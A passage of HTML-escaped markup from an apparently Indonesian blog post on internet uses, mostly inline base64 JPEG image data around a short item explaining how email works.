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&quot; /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;div&gt;
3. &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Berkirim surat melalui e-mail&lt;/span&gt;.&lt;/b&gt;&amp;nbsp;Di internet juga ada fasilitas 
e-mail (electronic mail). Kita dapat berkirim e-mail kepada teman, rekan
 kerja, saudara, dll. Menggunakannya sangat mudah, hanya dengan mengetik
 alamat e-mail ke orang yang kita tuju dan menulis pesannya, lalu klik 
send (kirim), maka pesan itu akan sampai kepada penerima hanya dalam 
hitungan menit atau bahkan hanya beberapa detik saja.&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img src=&quot;http://t2.gstatic.com/images?q=tbn:ANd9GcR8L0DrT0wNSNbNspIv2L9wMnYZyn8yL5NQPvhKcb-lsv6J6hyN&quot; /&gt; &lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img src=&quot;data:image/jpeg;base64,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